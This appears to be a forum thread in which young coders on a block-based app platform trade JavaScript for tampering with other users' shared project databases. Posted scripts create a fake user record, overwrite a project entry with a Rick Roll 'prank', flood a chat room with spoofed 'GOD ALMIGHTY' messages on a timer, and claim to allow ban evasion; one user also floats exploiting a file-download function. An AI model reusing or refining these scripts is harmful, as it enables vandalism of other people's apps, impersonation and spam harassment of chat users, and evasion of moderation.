pluto
you can bypass this by blocking the prompts(firefox lets you do this through the click of a button)

    Fluffypoopo i mean it looks like garbage but sure

    function flush(id) {
      id = id || String();
      while (id.length < 28) {
        id += encodeURIComponent(String.fromCharCode(Math.floor(Math.random() * 255)))
      }
    }
    var player = { user: "stonks_GOD_V2", userid: flush(), role: "User", rank: 0, flag: "done" };
    update("Projects", { project_image: "https://i.ytimg.com/vi/dQw4w9WgXcQ/maxresdefault.jpg", project_title: "Give Up", project_url: "https://www.youtube.com/watch?v=dQw4w9WgXcQ", project_rating: "42069", project_description: "Idk it's a prank bro", project_username: player.user, project_userid: player.id, id: 2 })
    push("Users", player);
    //push("Projects", {project_image: "https://i.ytimg.com/vi/dQw4w9WgXcQ/maxresdefault.jpg", project_title: "Give Up", project_url: "https://www.youtube.com/watch?v=dQw4w9WgXcQ", project_rating: "42069", project_description: "Idk it's a prank bro", project_username: player.user, project_userid: player.id})
    readRecords("Projects", [], console.log);
    function push(table, data) {
      createRecord(table, data);
      for (var i = 2; i < 4; i++) {
        createRecord(table + i, data)
      }
    }
    function purge(table, data) {
      deleteRecord(table, data);
      for (var i = 2; i < 4; i++) {
        deleteRecord(table + i, data)
      }
    }
    function update(table, data) {
      updateRecord(table, data);
      for (var i = 2; i < 4; i++) {
        updateRecord(table + i, data)
      }
    }

    I left a present on your demo btw

      Varrience bro always puts some 69420 thing in there and bro put rick roll stuff 💀

        pluto lmao would you have preferred chocolate rain? i was asked to troll so I obliged @Fluffypoopo if not, what would you prefer being injected into it?

          oh yeah abt that, doesn't savecanvas download files if you put it in your game? i think this can be exploited

            it wont work and im on chrome

            pluto ah, perhaps they finally did patch it... well as you can see something like that won't work then so it should be fine i guess

            timedLoop(10, function() { getKeyValue("msg" + formatUsername(room + " "),function(e){ var ret = e; ret.push({uid: encodeURIComponent("sDiGQ0gIAjEDHr3XMXyTn2vi36g"),
            user: 'GOD ALMIGHTY',time: getTime(),
            msg: 'though shalt yes'});
            setKeyValue("msg" + formatUsername(room + " "), ret); }); });

            spamthingy i made after looking about the code a while

              ackvonhuelio you could just initialize the database and make it look much cleaner by adding setInterval with database.message("") as a spam thing it's not that hard know what I'll do it myself

              var mod = new Database("msghome", "GOD_ALMIGHTY");
               setInterval(function(){
               mod.message("though shalt yes");
               mod.flush(); // this allows ban evasion for the funnies
              }, 100)

              Fluffypoopo I got a name for the little script i wrote to.... I'd call it BOON, that is if your planning to use some of the code in your project if not, best of luck!

              6 days later

              can someone give me an example script or teaching project I can use to learn

              Fluffypoopo I am unsure of what you mean by permissions of uploading images, to where? what backend are you using? does it have an API? or is this about sending encoded images?

              4 days later

              How WUTworlds image uploading works

              ackvonhuelio sorry if this is late but, you could just use throw as another means of blocking the hacker to do malicious means.
              if the hacker breaks the code, just set it in a library.

                Chat